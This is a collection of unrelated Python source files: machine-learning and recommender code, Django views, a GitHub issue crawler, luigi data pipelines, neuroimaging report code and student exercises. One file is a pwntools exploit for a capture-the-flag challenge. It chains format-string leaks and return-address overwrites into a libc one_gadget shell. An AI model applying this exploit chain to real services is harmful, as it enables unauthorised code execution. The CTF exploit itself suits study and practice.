pass
class LoginError(Error):
def __init__(self, message):
self.message = message
|
from collections import OrderedDict
from typing import Dict
import numpy as np
class Parameter:
def __init__(self, value: np.ndarray) -> None:
self.value: np.ndarray = value
self.grad: np.ndarray = np.zeros_like(value)
class Module:
def __init__(self):
self.__parameters: Dict[str, Parameter] = OrderedDict()
self.is_train: bool = False
pass
def forward(self, *x_input: np.ndarray):
raise Exception("Not implemented")
def backward(self, *d_output: np.ndarray):
raise Exception("Not implemented")
def register_parameter(self, param_name: str, parameter: Parameter) -> None:
if '_Module__parameters' not in self.__dict__:
raise Exception("Module was not initialized")
if param_name in self.__parameters.keys():
raise Exception("Parameter already exists")
self.__parameters[param_name] = parameter
def register_module_parameters(self, module_name: str, module) -> None:
assert isinstance(module, Module)
for name, parameter in module.parameters().items():
self.register_parameter(module_name + '_' + name, parameter)
def zero_grad(self):
for param in self.__parameters.values():
param.grad = np.zeros_like(param.value)
def parameters(self) -> Dict[str, Parameter]:
return self.__parameters
def predict(self, *x_input: np.ndarray):
raise Exception("Not implemented")
def train(self) -> None:
self.is_train = True
def eval(self) -> None:
self.is_train = False
|
'''
service module
'''
from .server import PrpcServer
from .client import PrpcClient
from .type_decorator import argument_check |
from onegov.activity import ActivityCollection
from onegov.feriennet.policy import ActivityQueryPolicy
from sqlalchemy.orm import joinedload
class VacationActivityCollection(ActivityCollection):
# type is ignored, but present to keep the same signature as the superclass
def __init__(self, session, type=None, pages=(0, 0), filter=None,
identity=None):
super().__init__(
session=session,
type='vacation',
pages=pages,
filter=filter
)
self.identity = identity
@property
def policy(self):
return ActivityQueryPolicy.for_identity(self.identity)
def transform_batch_query(self, query):
return query.options(joinedload('occasions'))
def query_base(self):
return self.policy.granted_subset(self.session.query(self.model_class))
def by_page_range(self, page_range):
return self.__class__(
session=self.session,
identity=self.identity,
pages=page_range,
filter=self.filter
)
|
"""
Efectuar la división de dos números enteros, utilizando
el método de las restas sucesivas. Observe el siguiente ejemplo:
Dividir 8 entre 2
8 – 2 = 6
6 – 2 = 4 número de restas efectuadas es igual al cociente =4
4 – 2 = 2
2 – 2 = 0 %resto de la división
Imprima el restante efectuado Ejemplos de prueba
"""
Cont=0
Dividendo=int(input("Ingresar Dividendo: "))
Divisor=int(input("Ingresar Divisor: "))
Dividendo=Dividendo-Divisor
while (Dividendo>=0):
Cont=Cont+1
Dividendo=Dividendo-Divisor
print("La Division es igual a: "+ str(Cont)) |
import datetime
def print_line(args):
if args.verbose == 1:
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ") + '-' * 72 )
def print_message(msg,args):
if args.verbose == 1:
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
def print_new_process(msg,args):
if args.verbose == 1:
print_line(args)
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
def print_end(msg,args):
if args.verbose == 1:
print_line(args)
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
print_line(args)
|
#!/usr/bin/env python3
text = input("Enter string: ")
my_list = text.split("h")
n_list = []
n_list.append(my_list[0])
n_list.append(my_list[-1])
text = "".join(n_list)
print(text)
|
import matplotlib.pyplot as plt
import itertools
def floating_point_system(beta, t, L, U):
"""
Entrada: beta que corresponde a la base o raiz, t que corresponde a la presicion y L, U corresponden a rango del exponente
Salida: Un sistema punto flotante normalizado correspondiente a las parametros.
"""
#Calculo de la cantidad de numeros flotantes del sistema
N = 2 * (beta - 1) * beta**(t-1) * (U - L + 1) + 1
#Calculo del numero mas pequeno que se puede representar
UFL = beta**(L)
#Calculo del numero mas grande que se puede representar
OFL = beta**(U+1) * (1 - beta**(-t))
#Tabla de verdad
table = list(itertools.product([0, 1], repeat=t-1))
numbers = []
for e in range(L, U+1):
#Calculo de la mantisa
for i in range(2**(t-1)):
#xi empieza en 1 pues para beta=2 el bit inicial siempre es 1
xi = 1
for j in range(t-1):
if table[i][j] == 1:
#Cuando haya un 1 en la tabla de verdad hago la operacion de cada di
xi += (1.0 / beta**(j+1))
num = xi * beta**(e)
#Agrego al sitema el numero positivo y negativo (+-)
numbers.append(num)
numbers.append(-num)
numbers.append(0.0)
return numbers, N, UFL, OFL
def graficar(x, N):
y = [0] * N
plt.axhline(0, color='black')
plt.ylim(-3, 3)
plt.plot(x, y, 'ro')
plt.grid()
plt.show()
|
##########################
# R imports: Import R
# objects using rpy2
##########################
from rpy2.robjects.packages import importr
import rpy2.robjects as robjects
R = robjects.r
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
GRF=importr('grf')
##########################
# Python imports
##########################
import argparse
from joblib import dump
import numpy as np
import pandas as pd
from sklearn.metrics import mean_squared_error
from data_generators.GRF_simulations import *
from py_utils.rpy2_conversions import *
##########################
# Params for all runs
##########################
n_test = 5000
##########################
# Get sample and split
##########################
def main(p, n, n_test, omega, kappa, additive, nuisance, seed):
#############################
# Make data
#############################
X, Y, W, Z, tau = get_sample(
p, n + n_test, omega, kappa, additive, nuisance, seed
)
X_train = X[:n]
Y_train = Y[:n]
W_train = W[:n]
Z_train = Z[:n]
tau_train = tau[:n]
X_test = X[n:]
Y_test = Y[n:]
W_test = W[n:]
Z_test = Z[n:]
tau_test = tau[n:]
all_data = {
'X_train': X_train,
'Y_train': Y_train[:,np.newaxis],
'W_train': W_train[:,np.newaxis],
'Z_train': Z_train[:,np.newaxis],
'tau_train': tau_train[:,np.newaxis],
'X_test': X_test,
'Y_test': Y_test[:,np.newaxis],
'W_test': W_test[:,np.newaxis],
'Z_test': Z_test[:,np.newaxis],
'tau_test': tau_test[:,np.newaxis],
}
dump(all_data, 'output/temp/data_for_DeepIV.pkl')
#############################
# Write params
#############################
params = {
'p': p,
'n': n,
'omega': omega,
'kappa': kappa,
'additive': additive,
'nuisance': nuisance,
'n_test': n_test,
'seed': seed
}
dump(params, 'output/temp/params.pkl')
if __name__=='__main__':
parser = argparse.ArgumentParser(description='One run of GRF simulation')
parser.add_argument('-p','--p', help='Ambient dimension', type=int)
parser.add_argument('-n','--n-samples', help='Number of training samples', type=int)
parser.add_argument('-kappa','--kappa', help='Number of informative features', type=int)
parser.add_argument('-omega','--omega', help='Presence (1)/absence (0) of confounding', type=int)
parser.add_argument('-additive','--additive', help='Aditivity of signal', choices=('True','False'))
parser.add_argument('-nuisance','--nuisance', help='Presence of nuisance main effect terms', choices=('True','False'))
parser.add_argument('-s','--seed', help='Random seed', type=int)
args = parser.parse_args()
args.additive = args.additive == 'True'
args.nuisance = args.nuisance == 'True'
main(args.p, args.n_samples, n_test, args.omega, args.kappa,
args.additive, args.nuisance, args.seed) |
import random
n1 = random.randint(1, 10)
answer = input('Enter some integer: ')
answer = int(answer)
print(f'You choose {answer}, computer {n1}')
if n1 > answer:
print(f'{n1} Bigger {answer}')
elif n1 < answer:
print(f'{n1} Less {answer}')
else:
print(f'{n1} Equal {answer}')
# висновок,що не дуже підходить, бо ти можеш завжди вводити максимально велике число
###################################################
n1 = random.randint(1, 10)
answer = input('Enter some integer: ')
answer = int(answer)
print(f'You choose {answer}, computer {n1}')
if answer > n1:
print(f'{answer} Bigger {n1}')
elif answer < n1:
print(f'{answer} Less {n1}')
else:
print(f'{answer} Equal {n1}')
##################################################
n1 = random.randint(1, 10)
answer = input('Enter some integer: ')
answer = int(answer)
print(f'You choose {answer}, computer {n1}')
if answer > n1:
print(f'{answer} Bigger {n1}')
elif answer < n1:
print(f'{answer} Less {n1}')
else:
print(f'{answer} Equal {n1}')
|
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./pwnable"
HOST = "binary.utctf.live"
PORT = 9003
"""
HOST = "localhost"
PORT = 7777
"""
if len(sys.argv) > 1 and sys.argv[1] == 'r':
conn = remote(HOST, PORT)
libc = ELF('./libc-2.23.so')
else:
conn = process(FILE_NAME)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF(FILE_NAME)
got_puts = elf.got["puts"]
got_printf = elf.got["printf"]
got_strcmp = elf.got["strcmp"]
off_puts = libc.symbols["puts"]
off_system = libc.symbols["system"]
#
#main_addr = elf.symbols["main"]
#libc_binsh = next(elf.search("/bin/sh"))
#addr_bss = elf.bss()
#addr_dynsym = elf.get_section_by_name('.dynsym').header['sh_addr']
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
fini_array = 0x600e18
def exploit():
buf_off = 6
padding = 0x8
payload = "%7$s,"
payload += "A"*(padding-len(payload))
payload += p64(got_puts)
conn.sendlineafter("do?\n", payload)
libc_puts = u64(conn.recv(6)+"\x00\x00")
libc_base = libc_puts - off_puts
libc_system = libc_base + off_system
payload = "%14$p,"
conn.sendlineafter("do?\n", payload)
old_rbp = int(conn.recvuntil(",")[:-1],16)
new_rsp = old_rbp - 0x50
ret_addr = old_rbp - 0x8
#ret_addr
padding = 0x10
payload = fsb(2, buf_off+(padding/8), ret_addr, 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x20)
conn.sendlineafter("do?\n", payload)
payload = fsb(2, buf_off+(padding/8), (ret_addr>>16), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x22)
conn.sendlineafter("do?\n", payload)
#payload = "A"
#payload += fsb(1, buf_off+(padding/8), 0x100-1, 0, 1)
payload = fsb(2, buf_off+(padding/8), (ret_addr>>32), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x24)
conn.sendlineafter("do?\n", payload)
#ret_addr+2
payload = fsb(2, buf_off+(padding/8), ret_addr+2, 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x28)
conn.sendlineafter("do?\n", payload)
payload = fsb(2, buf_off+(padding/8), (ret_addr+2>>16), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x28+2)
conn.sendlineafter("do?\n", payload)
#payload = "A"
#payload += fsb(2, buf_off+(padding/8), 0xffff, 0, 1)
payload = fsb(2, buf_off+(padding/8), (ret_addr+2>>32), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x28+4)
conn.sendlineafter("do?\n", payload)
#ret_addr+4
payload = fsb(2, buf_off+(padding/8), ret_addr+4, 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x30)
conn.sendlineafter("do?\n", payload)
payload = fsb(2, buf_off+(padding/8), (ret_addr+4>>16), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x30+2)
conn.sendlineafter("do?\n", payload)
#payload = "A"
#payload += fsb(2, buf_off+(padding/8), 0xffff, 0, 1)
payload = fsb(2, buf_off+(padding/8), (ret_addr+4>>32), 0, 1)
payload += "A"*(padding-len(payload))
payload += p64(new_rsp+0x30+4)
conn.sendlineafter("do?\n", payload)
payload = "%10$lx,%11$lx,%12$lx"
conn.sendlineafter("do?\n", payload)
print hex(ret_addr)
padding = 0x20
one_gadget = libc_base + gadget[1]
payload = fsb(2, buf_off+(padding/8), one_gadget, 0, 3)
conn.sendlineafter("do?\n", payload)
conn.interactive()
if __name__ == "__main__":
exploit()
|
from django.shortcuts import *
from django.http import HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.views.decorators.csrf import csrf_exempt
import hashlib, random, datetime
from surl.models import Surl
def get(request,_surl):
try:
s=Surl.objects.get(surl__exact=_surl)
except Surl.DoesNotExist:
return render_to_response('404.html')
return HttpResponseRedirect(s.lurl)
def test(request,_surl):
return HttpResponse(_surl)
def putindex(request):
l=Surl.objects.all().order_by('-add_date')[:5]
return render_to_response('putindex.html',{'the_list':l})
def __gensurl(lurl):
RANDSEED = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
surl=''
for i in range(6):
surl+=random.choice(RANDSEED)
return surl
def __procurl(lurl):
if lurl.find('://')==-1:
lurl='http://'+lurl
return lurl
@csrf_exempt
def add(request):
try:
_lurl=request.POST['url']
except(KeyError):
return HttpResponse('post something to me!')
#lurl
_lurl=__procurl(_lurl)
s = Surl(lurl=_lurl)
#fingerprint
m=hashlib.md5(_lurl)
s.fingerprint=m.hexdigest()
#add_date
s.add_date=datetime.datetime.now()
#surl=pk
_surl=__gensurl(_lurl)
while Surl.objects.filter(surl__exact=_surl):
_surl=__gensurl(_lurl)
s.surl=_surl
#res='success<br />long url: '+s.lurl+'<br />fingerprint: '+s.fingerprint+'<br />short url: http://192.168.1.200:7788/'+s.surl
res=_surl
s.save()
return HttpResponse(res)
|
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Post(models.Model):
author = 'test'
class Test(models.Model):
a = 1
# Create your models here.
|
import os
import json
import requests
import logging
from common_logger import init_logger
init_logger("graphql-crawl.log")
# Please issue your own personal access token
# https://github.com/settings/tokens
HEADERS = {"Authorization": "Bearer [YOUR_PERSONAL_ACCESSS_TOKEN]"}
# Top 5 repos that have the largest number of bug report based on GHTorrent data as of March 2021
OWNER_REPO_DICT = {"microsoft": "vscode"}
query_template = """
{
repository(owner: "%s", name: "%s") {
issues(last: %s %s) {
edges {
cursor
node {
author {
login
}
bodyText
createdAt
closed
closedAt
comments(first: 100) {
totalCount
nodes {
author {
login
}
body
createdAt
lastEditedAt
publishedAt
updatedAt
url
}
}
isPinned
url
title
updatedAt
publishedAt
lastEditedAt
number
state
labels(first: 100) {
nodes {
createdAt
name
}
totalCount
}
}
}
}
}
rateLimit {
limit
cost
remaining
resetAt
}
}
"""
def run_query(q: str) -> dict:
request = requests.post('https://api.github.com/graphql', json={'query': q}, headers=HEADERS)
if request.status_code == 200:
return request.json()
else:
raise Exception("Query failed to run by returning code of {}. {}".format(request.status_code, q))
def generate_query(repo_owner: str, name: str, issues_before_cursor: str = None, num_issues: int = 50) -> str:
before_cursor = ', before: "%s"' % issues_before_cursor if issues_before_cursor else ""
try:
q = query_template % (repo_owner, name, str(num_issues), before_cursor)
except Exception as e:
logging.error("Query failed", e, exc_info=True)
# return with smaller number of issues
return generate_query(repo_owner, name, issues_before_cursor, num_issues - 10)
return q
def crawl(repo_owner: str, name: str, output_directory: str,
issues_before_cursor: str = None, num_issues: int = 50) -> str:
query = generate_query(repo_owner, name, issues_before_cursor, num_issues)
try:
result = run_query(query)
except Exception as e:
logging.error("Query failed", e, exc_info=True)
return crawl(repo_owner, name, output_directory, issues_before_cursor, num_issues-20)
new_cursor = None
output_name = output_directory + issues_before_cursor if issues_before_cursor else output_dir + "first.json"
with open(output_name, "w") as f:
f.write(json.dumps(result))
edges = result['data']['repository']['issues']['edges']
if len(edges) == num_issues:
new_cursor = edges[0]['cursor']
logging.info("Next cursor: %s" % new_cursor)
remaining_rate_limit = result["data"]["rateLimit"]["remaining"] # Drill down the dictionary
logging.info("Remaining rate limit - {}".format(remaining_rate_limit))
return new_cursor
for owner, repo in OWNER_REPO_DICT.items():
output_dir = './%s-%s/' % (owner, repo)
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
cursor = crawl(owner, repo, output_dir, None)
while cursor:
cursor = crawl(owner, repo, output_dir, cursor)
logging.info("Crawling issues from '%s/%s' is done" % (owner, repo))
|
class GameSettings:
screenSize = {
"x": 600,
"y": 600
}
running = True
num_asteroids = 10
|
import logging
import os
from pathlib import Path
from commandbus import CommandBus
from google.cloud import bigquery
from pymongo import MongoClient
from pepy.application.admin_password_checker import AdminPasswordChecker
from pepy.application.badge_service import BadgeService, DownloadsNumberFormatter, PersonalizedBadgeService
from pepy.application.command import (
UpdateVersionDownloads,
UpdateVersionDownloadsHandler,
ImportTotalDownloads,
ImportTotalDownloadsHandler,
)
from pepy.domain.model import HashedPassword
from pepy.infrastructure.db_repository import MongoProjectRepository
from ._config import (
BQ_CREDENTIALS_FILE,
ADMIN_PASSWORD,
LOGGING_FILE,
LOGGING_DIR,
MONGODB,
environment,
Environment,
LOGGING_LEVEL,
)
from ..bq_stats_viewer import BQStatsViewer
from ...domain.pypi import StatsViewer, Result
class MockStatsViewer(StatsViewer):
def __init__(self):
self._rows = None
def set_data(self, rows):
self._rows = rows
def get_version_downloads(self, date):
return Result(len(self._rows), self._rows)
# Directories configuration
Path(LOGGING_DIR).mkdir(parents=True, exist_ok=True)
# Logger configuration
logger = logging.getLogger("pepy")
logger.setLevel(LOGGING_LEVEL)
formatter = logging.Formatter("[%(asctime)s] [%(levelname)s] [%(pathname)s:%(funcName)s:%(lineno)d]: %(message)s")
file_handler = logging.FileHandler(LOGGING_FILE)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(formatter)
logger.addHandler(consoleHandler)
mongo_client = MongoClient(MONGODB)
if environment == Environment.test:
project_repository = MongoProjectRepository(mongo_client.pepy_test)
else:
project_repository = MongoProjectRepository(mongo_client.pepy)
bq_client = None
if environment == Environment.prod:
bq_client = bigquery.Client.from_service_account_json(BQ_CREDENTIALS_FILE)
if environment == Environment.test:
stats_viewer = MockStatsViewer()
else:
stats_viewer = BQStatsViewer(bq_client)
admin_password_checker = AdminPasswordChecker(HashedPassword(ADMIN_PASSWORD))
command_bus = CommandBus()
command_bus.subscribe(
UpdateVersionDownloads,
UpdateVersionDownloadsHandler(project_repository, stats_viewer, admin_password_checker, logger),
)
command_bus.subscribe(ImportTotalDownloads, ImportTotalDownloadsHandler(project_repository, logger))
downloads_formatter = DownloadsNumberFormatter()
badge_service = BadgeService(project_repository, downloads_formatter)
personalized_badge_service = PersonalizedBadgeService(project_repository, downloads_formatter, logger)
|
"""
剑指offer第2章 面试题3 二维数组中的查找
"""
def find_ele_in_array(array, ele):
"""数组规律是向右向下增大,所以可以找中间的数字然后就可以排除了
比如9,如果要找的数字比9小,那么就可以排除1列,因为在第一列9是最小的
如果要找的数字比9大,那么就可以排除1行,因为在第一行9是最大的
同理也可以找6,由此可见,要找到中间数字,这样容易进行排除"""
# 右上角的元素坐标
if not array:
return False
columns = len(array[0])
rows = len(array)
# 从第一行开始迭代
# 迭代条件是扫描的行row 必须小于 总行数,并且列数往回缩必须大于等于0
# 用行号和列号来查找,这样避免删除数组元素这个不优雅的过程
# 先从右上角的元素开始
row = 0
column = columns - 1
while row < rows and column >= 0:
find_ele = array[row][column]
if find_ele == ele:
return True
elif find_ele > ele:
column -= 1
else:
row += 1
return False
def find_ele_in_array_left(array, ele):
"""从左下角开始寻找"""
if not array:
return False
rows = len(array)
columns = len(array[0])
# 从最后一行,第一列开始
row = rows - 1
column = 0
while column < columns and row >= 0:
find_ele = array[row][column]
if find_ele == ele:
return True
elif find_ele > ele:
row -= 1
else:
column += 1
return False
if __name__ == "__main__":
test_array = [[1, 2, 8, 9],
[2, 4, 9, 12],
[4, 7, 10, 13],
[6, 8, 11, 15]]
test_search_ele1 = 7
test_search_ele2 = 5
# 从右上角开始寻找
assert find_ele_in_array(test_array, test_search_ele1)
assert not find_ele_in_array(test_array, test_search_ele2)
# 从左下角开始寻找
assert find_ele_in_array_left(test_array, test_search_ele1)
assert not find_ele_in_array_left(test_array, test_search_ele2)
test_array = []
assert not find_ele_in_array(test_array, test_search_ele2)
assert not find_ele_in_array_left(test_array, test_search_ele2)
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""Interfaces to generate reportlets."""
from pathlib import Path
import time
from nipype.interfaces.base import (
TraitedSpec,
BaseInterfaceInputSpec,
File,
Directory,
InputMultiObject,
Str,
isdefined,
SimpleInterface,
)
from nipype.interfaces import freesurfer as fs
from nipype.interfaces.io import FSSourceInputSpec as _FSSourceInputSpec
from nipype.interfaces.mixins import reporting
from niworkflows.interfaces.reportlets.base import _SVGReportCapableInputSpec
SUBJECT_TEMPLATE = """\
\t<ul class="elem-desc">
\t\t<li>Subject ID: {subject_id}</li>
\t\t<li>Structural images: {n_t1s:d} T1-weighted {t2w}</li>
\t\t<li>Standard spaces: {output_spaces}</li>
\t\t<li>FreeSurfer reconstruction: {freesurfer_status}</li>
\t</ul>
"""
ABOUT_TEMPLATE = """\t<ul>
\t\t<li>sMRIPrep version: {version}</li>
\t\t<li>sMRIPrep command: <code>{command}</code></li>
\t\t<li>Date preprocessed: {date}</li>
\t</ul>
</div>
"""
class _SummaryOutputSpec(TraitedSpec):
out_report = File(exists=True, desc="HTML segment containing summary")
class SummaryInterface(SimpleInterface):
"""Base Nipype interface for html summaries."""
output_spec = _SummaryOutputSpec
def _run_interface(self, runtime):
segment = self._generate_segment()
path = Path(runtime.cwd) / "report.html"
path.write_text(segment)
self._results["out_report"] = str(path)
return runtime
def _generate_segment(self):
raise NotImplementedError
class _SubjectSummaryInputSpec(BaseInterfaceInputSpec):
t1w = InputMultiObject(File(exists=True), desc="T1w structural images")
t2w = InputMultiObject(File(exists=True), desc="T2w structural images")
subjects_dir = Directory(desc="FreeSurfer subjects directory")
subject_id = Str(desc="Subject ID")
output_spaces = InputMultiObject(Str, desc="list of standard spaces")
class _SubjectSummaryOutputSpec(_SummaryOutputSpec):
# This exists to ensure that the summary is run prior to the first ReconAll
# call, allowing a determination whether there is a pre-existing directory
subject_id = Str(desc="FreeSurfer subject ID")
class SubjectSummary(SummaryInterface):
"""Subject html summary reportlet."""
input_spec = _SubjectSummaryInputSpec
output_spec = _SubjectSummaryOutputSpec
def _run_interface(self, runtime):
if isdefined(self.inputs.subject_id):
self._results["subject_id"] = self.inputs.subject_id
return super()._run_interface(runtime)
def _generate_segment(self):
if not isdefined(self.inputs.subjects_dir):
freesurfer_status = "Not run"
else:
recon = fs.ReconAll(
subjects_dir=self.inputs.subjects_dir,
subject_id=self.inputs.subject_id,
T1_files=self.inputs.t1w,
flags="-noskullstrip",
)
if recon.cmdline.startswith("echo"):
freesurfer_status = "Pre-existing directory"
else:
freesurfer_status = "Run by sMRIPrep"
t2w_seg = ""
if self.inputs.t2w:
t2w_seg = f"(+ {len(self.inputs.t2w):d} T2-weighted)"
output_spaces = self.inputs.output_spaces
if not isdefined(output_spaces):
output_spaces = "<none given>"
else:
output_spaces = ", ".join(output_spaces)
return SUBJECT_TEMPLATE.format(
subject_id=self.inputs.subject_id,
n_t1s=len(self.inputs.t1w),
t2w=t2w_seg,
output_spaces=output_spaces,
freesurfer_status=freesurfer_status,
)
class _AboutSummaryInputSpec(BaseInterfaceInputSpec):
version = Str(desc="sMRIPrep version")
command = Str(desc="sMRIPrep command")
# Date not included - update timestamp only if version or command changes
class AboutSummary(SummaryInterface):
"""About section reportlet."""
input_spec = _AboutSummaryInputSpec
def _generate_segment(self):
return ABOUT_TEMPLATE.format(
version=self.inputs.version,
command=self.inputs.command,
date=time.strftime("%Y-%m-%d %H:%M:%S %z"),
)
class _FSSurfaceReportInputSpec(_SVGReportCapableInputSpec, _FSSourceInputSpec):
pass
class _FSSurfaceReportOutputSpec(reporting.ReportCapableOutputSpec):
pass
class FSSurfaceReport(SimpleInterface):
"""Replaces ``ReconAllRPT``, without need of calling recon-all."""
input_spec = _FSSurfaceReportInputSpec
output_spec = _FSSurfaceReportOutputSpec
def _run_interface(self, runtime):
from niworkflows.viz.utils import (
plot_registration,
cuts_from_bbox,
compose_view,
)
from nibabel import load
rootdir = Path(self.inputs.subjects_dir) / self.inputs.subject_id
_anat_file = str(rootdir / "mri" / "brain.mgz")
_contour_file = str(rootdir / "mri" / "ribbon.mgz")
anat = load(_anat_file)
contour_nii = load(_contour_file)
n_cuts = 7
cuts = cuts_from_bbox(contour_nii, cuts=n_cuts)
self._results["out_report"] = str(Path(runtime.cwd) / self.inputs.out_report)
# Call composer
compose_view(
plot_registration(
anat,
"fixed-image",
estimate_brightness=True,
cuts=cuts,
contour=contour_nii,
compress=self.inputs.compress_report,
),
[],
out_file=self._results["out_report"],
)
return runtime
|
import math
from main.info import config
def user_based_predict_by_knn(dao,userid,itemid):
sim_list = get_user_topk_neighbor(dao,userid)
other_user_rate_list = []
userbaseline = get_Baseline(dao,userid)
for u,s in sim_list:
r = dao.get_rate(u,itemid) #get other users rate
if r:
other_user_rate_list.append((u,s,r)) #user, similarity, rate
if len(other_user_rate_list) == 0: #no item in neighbor
#print "No enough information to predict item:%d for user %d."%(itemid,userid)
#print "return user's baseline rate for the item."
return userbaseline
else:
sum1 = 0.
sum2 = 0.
for u,s,r in other_user_rate_list:
sum1 += s * (r - get_Baseline(dao,u))
sum2 += s
if sum2 == 0:
#print("No neighbot avilable for " + str(userid))
return userbaseline #return baseline
predict_rate = userbaseline + sum1 / sum2
return predict_rate
def get_user_rating_mean(dao, userid):
rates = dao.get_item_list_by_user(userid)
total = 0.
for i,r in rates:
total += r
return total / len(rates)
def new_DAO_interface():
return DAOtype()
def get_user_topk_neighbor(dao,userid):
return dao.get_user_sim_list(userid,neiborsize)
def sim_adjust(x):
th = 0.05
a = 3
if x > th:
p = math.pow(x/th,a)*th
else:
p = x
return p
def item_based_predict_by_knn(dao,userid,itemid):
sim_list = []
item_list = dao.get_item_list_by_user(userid)
for i,r in item_list:
sim_i = dao.get_sim_between_two_items(itemid,i)
if sim_i > 0: #only append items with similarity above zero.
sim_list.append((sim_i,r))
sim_list.sort(reverse = True)
if len(sim_list) == 0: #return baseline if no item available
return get_Baseline(dao,userid)
sum1 = 0.
sum2 = 0.
for s,r in sim_list:
sum1 += r * s
sum2 += s
predict_rate = sum1 / sum2
return predict_rate
def get_config():
global CF_config, neiborsize, neibormodel, BP, storetype
global predict_item_score, get_Baseline, DAOtype, pmodel
CF_config = config.Config().configdict['user_item_CF']
neiborsize = CF_config['neighborsize_k']
neibormodel = CF_config['neighbormodel']
BP = CF_config['baseline_predictor']
pmodel = CF_config['model']
storetype = config.Config().configdict['global']['storage']
#choose function
if neibormodel == 'knn':
if pmodel == 'user-based':
predict_item_score = user_based_predict_by_knn;
elif pmodel == 'item-based':
predict_item_score = item_based_predict_by_knn;
else:
print "You should never get here wrong config for model."
if BP == 'mean':
get_Baseline = get_user_rating_mean
if storetype == 'redis':
from main.DAO import redisDAO
DAOtype = redisDAO.redisDAO
get_config()
config.Config().register_function(get_config)
if __name__ == "__main__":
dao = new_DAO_interface()
for i in range(1,135):
user_based_predict_by_knn(dao,44,i)
|
__author__ = "Rinat Khaziev"
__copyright__ = "Copyright 2016"
import luigi
import requests
import pandas as pd
import datetime
class DownloadTaskDate(luigi.ExternalTask):
'''
Download data luigi task
'''
date = luigi.DateParameter(default=datetime.date.today())
def run(self):
url = 'https://data.cityofchicago.org/api/views/ydr8-5enu/rows.csv?accessType=DOWNLOAD'
response = requests.get(url)
self.output().makedirs()
with self.output().open('w') as out_file:
out_file.write(response.text)
def output(self):
return luigi.LocalTarget('data/permits-{0}.csv'.format(str(self.date)))
class CleanCsv(luigi.Task):
'''
Clean csv file
'''
def requires(self):
return DownloadTaskDate(date=datetime.date.today())
def output(self):
return luigi.LocalTarget('data/permits_clean.csv')
def run(self):
#read data and remove trailing and preceding whitespaces
df = pd.read_csv('data/permits-{0}.csv'.format(str(datetime.date.today())))
df.columns = [x.strip() for x in df.columns]
df = df.applymap(lambda x: str(x).replace('$', ''))
with self.output().open('w') as out_file:
df.to_csv(out_file, index = False)
class CountPermitTypes(luigi.Task):
'''
Count permits of each type
'''
def requires(self):
return CleanCsv()
def output(self):
return luigi.LocalTarget('data/permit_counts.csv')
def run(self):
df = pd.read_csv('data/permits_clean.csv')
counts = df['PERMIT_TYPE'].value_counts()
with self.output().open('w') as out_file:
counts.to_csv(out_file)
class PermitMeanPrice(luigi.Task):
'''
Calculate estimated permit price of each type
'''
def requires(self):
return CleanCsv()
def output(self):
return luigi.LocalTarget('data/mean_permit_price.csv')
def run(self):
df = pd.read_csv('data/permits_clean.csv')
mean_price = df.groupby('PERMIT_TYPE')['ESTIMATED_COST'].mean()
mean_price.sort(inplace = True, ascending = False)
with self.output().open('w') as out_file:
mean_price.to_csv(out_file)
class PermitTopPrice(luigi.Task):
'''
Find top n most largest permit fees
'''
top_n = luigi.IntParameter()
def requires(self):
return CleanCsv()
def output(self):
return luigi.LocalTarget('data/top_10_permits.csv')
def run(self):
df = pd.read_csv('data/permits_clean.csv')
#check if the dataframe is too small for a given top_n
if(len(df) < self.top_n):
self.top_n = len(df)
df_sorted = df.sort('AMOUNT_PAID', ascending=False).head(self.top_n)
with self.output().open('w') as out_file:
df_sorted.to_csv(out_file)
class RunAll(luigi.Task):
'''
Execute all of the tasks
'''
def requires(self):
return PermitTopPrice(top_n=10), PermitMeanPrice(), CountPermitTypes()
|
# Gil Garcia
# ASTR221 - hw3 prob 2
#4/4/2019
'''
In this script, we query the Gaia DR2 catalog to find the HR diagram for M4, a globular cluster
and fit it with ZAMS
'''
# we import the required libraries
import numpy as np
import matplotlib.pyplot as plt
# we use vizier to query the Hiparcos catalog
from astroquery.vizier import Vizier
# we use angle to define our radius for our cone searches
from astropy.coordinates import Angle
# we will query gaia dr2
from astroquery.gaia import Gaia
#data management
import pandas as pd
'''
defini
'''
#The distance modulus to calculate the absolute magnitude
def distance_modulus(apparant_m,distance):
term2 = 5*(np.log10(distance)-1)
